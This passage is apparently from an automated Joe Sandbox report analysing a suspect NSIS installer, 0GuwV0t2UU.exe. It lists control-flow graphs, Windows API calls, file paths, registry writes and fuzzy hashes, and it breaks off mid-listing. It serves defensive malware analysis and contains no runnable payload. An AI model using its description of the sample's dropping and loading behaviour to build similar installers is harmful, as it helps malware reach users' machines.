                                                      • API String ID: 2803837635-1672654585
                                                      • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                      • Instruction ID: 4d59aa34fe8aef517225e0e03f455ac639a07fb2fd098cfe03fbce1fe051b31e
                                                      • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                      • Instruction Fuzzy Hash: 4671D071A00204ABDB20DFA4DD86BAE3EACAB04715F20457FE915B72C1CB789F418B5C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 812 4066df-4066e8 813 4066ea-4066f9 812->813 814 4066fb-406715 812->814 813->814 815 406925-40692b 814->815 816 40671b-406727 814->816 818 406931-40693e 815->818 819 406739-406746 815->819 816->815 817 40672d-406734 816->817 817->815 821 406940-406945 call 4066a2 818->821 822 40694a-40694d 818->822 819->818 820 40674c-406755 819->820 823 406912 820->823 824 40675b-40679e 820->824 821->822 826 406920-406923 823->826 827 406914-40691e 823->827 828 4067a4-4067b0 824->828 829 4068b6-4068ba 824->829 826->815 827->815 830 4067b2 828->830 831 4067ba-4067bc 828->831 832 4068bc-4068c3 829->832 833 4068ee-4068f2 829->833 830->831 838 4067f6-4067f9 831->838 839 4067be-4067dc call 406570 831->839 836 4068d3-4068df call 4066a2 832->836 837 4068c5-4068d1 call 4065e9 832->837 834 406902-406910 lstrlenW 833->834 835 4068f4-4068fd call 4066df 833->835 834->815 835->834 851 4068e4-4068ea 836->851 837->851 840 4067fb-406807 GetSystemDirectoryW 838->840 841 40680c-40680f 838->841 850 4067e1-4067e4 839->850 846 406899-40689c 840->846 847 406821-406825 841->847 848 406811-40681d GetWindowsDirectoryW 841->848 853 4068ae-4068b4 call 406950 846->853 854 40689e-4068a1 846->854 847->846 855 406827-406845 847->855 848->847 850->854 856 4067ea-4067f1 call 4066df 850->856 851->834 852 4068ec 851->852 852->853 853->834 854->853 857 4068a3-4068a9 lstrcatW 854->857 859 406847-40684d 855->859 860 406859-406871 call 406a96 855->860 856->846 857->853 865 406855-406857 859->865 869 406873-406886 SHGetPathFromIDListW CoTaskMemFree 860->869 870 406888-406891 860->870 865->860 867 406893-406897 865->867 867->846 869->867 869->870 870->855 870->867
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406801
                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406875
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                      • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 4024019347-1230650788
                                                      • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                      • Instruction ID: c05bc8db6a500faa8ceae89892d654845b9b7d80f8daaf315b7a9d2c48b59061
                                                      • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                      • Instruction Fuzzy Hash: CE6147B2A053019BEB20AF24DC84B6B77D8AF54314F26453FF587B26D0DA3C8961875E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 871 401794-4017b9 call 402dcb call 405fe8 876 4017c3-4017d5 call 4066a2 call 405f71 lstrcatW 871->876 877 4017bb-4017c1 call 4066a2 871->877 882 4017da-4017db call 406950 876->882 877->882 886 4017e0-4017e4 882->886 887 4017e6-4017f0 call 4069ff 886->887 888 401817-40181a 886->888 895 401802-401814 887->895 896 4017f2-401800 CompareFileTime 887->896 890 401822-40183e call 406192 888->890 891 40181c-40181d call 40616d 888->891 898 401840-401843 890->898 899 4018b2-4018db call 405727 call 403396 890->899 891->890 895->888 896->895 901 401894-40189e call 405727 898->901 902 401845-401883 call 4066a2 * 2 call 4066df call 4066a2 call 405d02 898->902 912 4018e3-4018ef SetFileTime 899->912 913 4018dd-4018e1 899->913 914 4018a7-4018ad 901->914 902->886 935 401889-40188a 902->935 916 4018f5-401900 CloseHandle 912->916 913->912 913->916 917 402c58 914->917 919 401906-401909 916->919 920 402c4f-402c52 916->920 921 402c5a-402c5e 917->921 923 40190b-40191c call 4066df lstrcatW 919->923 924 40191e-401921 call 4066df 919->924 920->917 930 401926-4023bd 923->930 924->930 933 4023c2-4023c7 930->933 934 4023bd call 405d02 930->934 933->921 934->933 935->914 936 40188c-40188d 935->936 936->901
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\fllesskabsejede\Modfaldent,?,?,00000031), ref: 004017D5
                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\fllesskabsejede\Modfaldent,?,?,00000031), ref: 004017FA
                                                        • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                        • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                        • Part of subcall function 00405727: lstrcatW.KERNEL32(00421F28,004030CD,004030CD,00421F28,00000000,00000000,00000000), ref: 00405782
                                                        • Part of subcall function 00405727: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405794
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                        • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaC158.tmp$C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dll$C:\Users\user\fllesskabsejede\Modfaldent$Call
                                                      • API String ID: 1941528284-3690397127
                                                      • Opcode ID: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                      • Instruction ID: adf8bb8e975ebc770d7c27afbe064fe35cfd0cbf1071ecc95f96a86e7a4b9e55
                                                      • Opcode Fuzzy Hash: 35c3f6a2f7561330f216546da6f00e51e59c92991de695342cfad82cb0a0900a
                                                      • Instruction Fuzzy Hash: 8A41C671900105BACF117BA5CD85DAE3A79EF45368F21823FF422B10E1D73D8E91AA2D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 937 402711-40272a call 402da9 940 402730-402737 937->940 941 402c4f-402c52 937->941 943 402739 940->943 944 40273c-40273f 940->944 942 402c58-402c5e 941->942 943->944 945 4028a3-4028ab 944->945 946 402745-402754 call 406602 944->946 945->941 946->945 950 40275a 946->950 951 402760-402764 950->951 952 4027f9-4027fc 951->952 953 40276a-402785 ReadFile 951->953 955 402814-402824 call 406215 952->955 956 4027fe-402801 952->956 953->945 954 40278b-402790 953->954 954->945 958 402796-4027a4 954->958 955->945 965 402826 955->965 956->955 959 402803-40280e call 406273 956->959 962 4027aa-4027bc MultiByteToWideChar 958->962 963 40285f-40286b call 4065e9 958->963 959->945 959->955 962->965 966 4027be-4027c1 962->966 963->942 968 402829-40282c 965->968 969 4027c3-4027ce 966->969 968->963 971 40282e-402833 968->971 969->968 972 4027d0-4027f5 SetFilePointer MultiByteToWideChar 969->972 973 402870-402874 971->973 974 402835-40283a 971->974 972->969 975 4027f7 972->975 976 402891-40289d SetFilePointer 973->976 977 402876-40287a 973->977 974->973 978 40283c-40284f 974->978 975->965 976->945 979 402882-40288f 977->979 980 40287c-402880 977->980 978->945 981 402851-402857 978->981 979->945 980->976 980->979 981->951 982 40285d 981->982 982->945
                                                      APIs
                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040277D
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                        • Part of subcall function 00406273: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406289
                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                      • String ID: 9
                                                      • API String ID: 163830602-2366072709
                                                      • Opcode ID: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                      • Instruction ID: 77fbecb4268093b3ffff8c623a80bd5bb6512b600f7762490a4bde5bc174ce64
                                                      • Opcode Fuzzy Hash: f4cc411d6a691ff0d779ee2962e3d04b2c777b5052aec2b7df3f44af6f7597f5
                                                      • Instruction Fuzzy Hash: 9A511D75D04219AADF20EFD4CA85AAEBB79FF44304F14817BE501B62D0D7B89D82CB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 983 406a26-406a46 GetSystemDirectoryW 984 406a48 983->984 985 406a4a-406a4c 983->985 984->985 986 406a5d-406a5f 985->986 987 406a4e-406a57 985->987 989 406a60-406a93 wsprintfW LoadLibraryExW 986->989 987->986 988 406a59-406a5b 987->988 988->989
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                      • wsprintfW.USER32 ref: 00406A78
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                      • String ID: %s%S.dll$UXTHEME
                                                      • API String ID: 2200240437-1106614640
                                                      • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                      • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                      • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                      • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 990 6e9f1817-6e9f1856 call 6e9f1bff 994 6e9f185c-6e9f1860 990->994 995 6e9f1976-6e9f1978 990->995 996 6e9f1869-6e9f1876 call 6e9f2480 994->996 997 6e9f1862-6e9f1868 call 6e9f243e 994->997 1002 6e9f1878-6e9f187d 996->1002 1003 6e9f18a6-6e9f18ad 996->1003 997->996 1006 6e9f187f-6e9f1880 1002->1006 1007 6e9f1898-6e9f189b 1002->1007 1004 6e9f18af-6e9f18cb call 6e9f2655 call 6e9f1654 call 6e9f1312 GlobalFree 1003->1004 1005 6e9f18cd-6e9f18d1 1003->1005 1027 6e9f1925-6e9f1929 1004->1027 1011 6e9f191e-6e9f1924 call 6e9f2655 1005->1011 1012 6e9f18d3-6e9f191c call 6e9f1666 call 6e9f2655 1005->1012 1009 6e9f1888-6e9f1889 call 6e9f2b98 1006->1009 1010 6e9f1882-6e9f1883 1006->1010 1007->1003 1013 6e9f189d-6e9f189e call 6e9f2e23 1007->1013 1022 6e9f188e 1009->1022 1015 6e9f1885-6e9f1886 1010->1015 1016 6e9f1890-6e9f1896 call 6e9f2810 1010->1016 1011->1027 1012->1027 1025 6e9f18a3 1013->1025 1015->1003 1015->1009 1031 6e9f18a5 1016->1031 1022->1025 1025->1031 1032 6e9f192b-6e9f1939 call 6e9f2618 1027->1032 1033 6e9f1966-6e9f196d 1027->1033 1031->1003 1040 6e9f193b-6e9f193e 1032->1040 1041 6e9f1951-6e9f1958 1032->1041 1033->995 1038 6e9f196f-6e9f1970 GlobalFree 1033->1038 1038->995 1040->1041 1042 6e9f1940-6e9f1948 1040->1042 1041->1033 1043 6e9f195a-6e9f1965 call 6e9f15dd 1041->1043 1042->1041 1044 6e9f194a-6e9f194b FreeLibrary 1042->1044 1043->1033 1044->1041
                                                      APIs
                                                        • Part of subcall function 6E9F1BFF: GlobalFree.KERNEL32(?), ref: 6E9F1E74
                                                        • Part of subcall function 6E9F1BFF: GlobalFree.KERNEL32(?), ref: 6E9F1E79
                                                        • Part of subcall function 6E9F1BFF: GlobalFree.KERNEL32(?), ref: 6E9F1E7E
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F18C5
                                                      • FreeLibrary.KERNEL32(?), ref: 6E9F194B
                                                      • GlobalFree.KERNEL32(00000000), ref: 6E9F1970
                                                        • Part of subcall function 6E9F243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E9F246F
                                                        • Part of subcall function 6E9F2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E9F1896,00000000), ref: 6E9F28E0
                                                        • Part of subcall function 6E9F1666: wsprintfW.USER32 ref: 6E9F1694
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                      • String ID:
                                                      • API String ID: 3962662361-3916222277
                                                      • Opcode ID: 6846e559bd0894491c4e11c334b51eb6595cdc89f26587179cb7900154a79728
                                                      • Instruction ID: beea60a3567806c90ee569c421ab549dea0ceceb75a313390e328d8e1075cb81
                                                      • Opcode Fuzzy Hash: 6846e559bd0894491c4e11c334b51eb6595cdc89f26587179cb7900154a79728
                                                      • Instruction Fuzzy Hash: 2E4194F1804241EBDF009FE6E988BD537ACAF57358F044865E9199A08BDB74C58A8FE0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1047 4024af-4024e0 call 402dcb * 2 call 402e5b 1054 4024e6-4024f0 1047->1054 1055 402c4f-402c5e 1047->1055 1056 4024f2-4024ff call 402dcb lstrlenW 1054->1056 1057 402503-402506 1054->1057 1056->1057 1060 402508-402519 call 402da9 1057->1060 1061 40251a-40251d 1057->1061 1060->1061 1065 40252e-402542 RegSetValueExW 1061->1065 1066 40251f-402529 call 403396 1061->1066 1069 402544 1065->1069 1070 402547-402628 RegCloseKey 1065->1070 1066->1065 1069->1070 1070->1055
                                                      APIs
                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000023,00000011,00000002), ref: 004024FA
                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,00000011,00000002), ref: 0040253A
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,00000011,00000002), ref: 00402622
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseValuelstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsaC158.tmp
                                                      • API String ID: 2655323295-2599538234
                                                      • Opcode ID: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                      • Instruction ID: bf0ef5d62df918b2bfabe39acf8ac680016d82ecec6d2e1c9a4cf4f2d71e963b
                                                      • Opcode Fuzzy Hash: 2d77ac209ad71615f5808e7cf79d7c16757800db2c4d3381873f5c9cabcdec34
                                                      • Instruction Fuzzy Hash: 2911A231D00115BEEB10AFA58E4AAAEB6B4EB44318F21443FF404B71D1C7B88E419668

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1072 4061c1-4061cd 1073 4061ce-406202 GetTickCount GetTempFileNameW 1072->1073 1074 406211-406213 1073->1074 1075 406204-406206 1073->1075 1077 40620b-40620e 1074->1077 1075->1073 1076 406208 1075->1076 1076->1077
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004061DF
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403663,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F), ref: 004061FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-1331003597
                                                      • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                      • Instruction ID: f348173cd445ce0cff63ab1922c44f7ab34be52ec2d52f6d3f60174017d9ed76
                                                      • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                      • Instruction Fuzzy Hash: 3BF06D76701204BBEB109B59DD05E9AB7A8EBA1710F11803EEA01A6240E6B099648764

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1162 4015e6-4015fa call 402dcb call 40601c 1167 401656-401659 1162->1167 1168 4015fc-40160f call 405f9e 1162->1168 1170 401688-40231b call 401423 1167->1170 1171 40165b-40167a call 401423 call 4066a2 SetCurrentDirectoryW 1167->1171 1175 401611-401614 1168->1175 1176 401629-40162c call 405c50 1168->1176 1186 402c4f-402c5e 1170->1186 1171->1186 1191 401680-401683 1171->1191 1175->1176 1180 401616-40161d call 405c6d 1175->1180 1183 401631-401633 1176->1183 1180->1176 1195 40161f-401622 call 405bf6 1180->1195 1187 401635-40163a 1183->1187 1188 40164c-401654 1183->1188 1192 401649 1187->1192 1193 40163c-401647 GetFileAttributesW 1187->1193 1188->1167 1188->1168 1191->1186 1192->1188 1193->1188 1193->1192 1197 401627 1195->1197 1197->1183
                                                      APIs
                                                        • Part of subcall function 0040601C: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,?,00406090,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,C:\Users\user\AppData\Local\Temp\nsaC158.tmp, 4Wu.Wu,?,75572EE0,00405DCE,?,75573420,75572EE0,"C:\Users\user\Desktop\0GuwV0t2UU.exe"), ref: 0040602A
                                                        • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                        • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                        • Part of subcall function 00405BF6: CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\fllesskabsejede\Modfaldent,?,00000000,000000F0), ref: 00401672
                                                      Strings
                                                      • C:\Users\user\fllesskabsejede\Modfaldent, xrefs: 00401665
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
